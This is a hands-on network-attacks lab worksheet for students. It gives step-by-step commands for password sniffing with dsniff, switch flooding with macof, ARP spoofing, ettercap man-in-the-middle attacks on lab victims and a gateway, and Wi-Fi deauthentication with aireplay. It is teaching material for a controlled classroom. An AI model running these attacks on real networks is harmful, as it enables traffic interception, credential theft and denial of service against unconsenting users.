Network Attacks Lab
-------------------------------------------------------------------------------------------------------
Many of these attacks will work on both WIRED and WIRELESS targets.
You can use any of:
1) Ubuntu Desktop WIRED, or
2) Boot BackTrack Desktop WIRED, or
3) Boot BackTrack on your Notebook WIRELESS
The three tools we will try are:
dsniff tools, ettercap, and aircrack
-------------------------------------------------------------------------------------------------------
DSNIFF
1 -- % dsniff
Let's run %dsniff, and see if we sniff any passwords
or password hashes during this lab.
a) open a Terminal window in your 2ndary Workspace
b) in that Terminal just type:
dsniff
Just leave it running in that window.
We'll come back and look at this window at the end of the lab
2 -- % macof
("macof" stands for "MAC OverFlow...").
Let's flood the lookup table of the switch and see if we start
to see more traffic. First we want to launch a traffic analysis
tool, such as %iptraf, to see what the normal traffic rate is.
a) run iptraf, select monitor mode for your main interface
iptraf
b) leave that running in a window
c) open another window and run
macof
d) did you start seeing a lot more TCP connections
in the iptraf window? __________________________________
3 -- % arpspoof
a) Pick 2 machines in your group for this exercise.
Machine #1 is the VICTIM
Write Down the IP Address of Machine #1 ___________________
Visit the Website http://www.cnn.com/
Look at your ARP Cache. ( arp -a, or ip show neighbor )
What is the MAC Address of the Gateway? ___________________
b) Machine #2 is the Attacker
-- Install/Start APACHE on Machine #2
-- Change the Default Webpage on Machine #2 to Say: "Owned by Group #<Your Group>"
This is probably in the directory /var/www/html/index.html
-- Check your webpage with a browser so you know it is working.
c) figure out what the IP Address of the Default Gateway
is on your network. Example: netstat -r -n
Default route should start with 0.0.0.0 then the Gateway IP address
d) Attack Machine #1 from Machine #2
arpspoof -t <VICTIM-IP-ADDRESS> GW-IP-Address
e) now have the VICTIM connect to http://www.cnn.com/
Did they see your webpage? _____________________________
f) Have the VICTIM look at the ARP Cache.
What is the MAC Address of the Gateway?____________________
If this attack does not work, try it one more time.
-------------------------------------------------------------------------------------------------------
ETTERCAP
1 -- % ettercap MITM #1
Let's see if we can run a Man-In-The-Middle Attack.
For this exercise, we need three machines: 2 Victims
and 1 Attacker. Write down the IP Addresses:
a) IP of VICTIM #1 _________________________________________
b) IP of VICTIM #2 _________________________________________
c) IP of ATTACKER ________________________________________
Run A Sniffer On the ATTACKER Machine to Watch For Traffic
ex. tshark -n -i eth0
or
wireshark
d) try the attack
ettercap -T -M arp /victim1/ /victim2/
e) now have VICTIM1 send traffic to VICTIM2,
for example, on VICTIM1 say:
telnet <IP-OF-VICTIM2>
f) Did you see the traffic on the ATTACKER machine?________________
2 -- % ettercap MITM #2
Keep your traffic sniffer running on the attack machine.
Let's try another attack with ettercap.
a) IP of VICTIM_________________________________
b) IP of GATEWAY______________________________
ettercap -T -M arp:remote /VICTIM-IP/ /GATEWAY-IP/
c) Try some Remote Traffic on the VICTIM, ex. http://www.cnn.com/
d) Do you see the traffic on the ATTACKER machine?____________________
e) Add the plugin option
ettercap -T -P repoison_arp arp:remote /VICTIM-IP/ /GATEWAY-IP/
Try it again.
-------------------------------------------------------------------------------------------------------
AIRCRACK
Let's try and knock someone off of their AP connection.
We'll send management frames to disassociate them from their AP.
a) select a wireless VICTIM
b) what is the wireless MAC Address of VICTIM ____________________
c) what is the wireless MAC Address of the AP_____________________
(Just have the victim look at %iwconfig output)
d) Launch the attack:
aireplay -0 1 -a VICTIM-MAC -c AP-MAC [interface]
NOTE: the MAC notation is: 00:11:22:33:44:55
e) did the VICTIM lose connection during the attack???_________________
--- END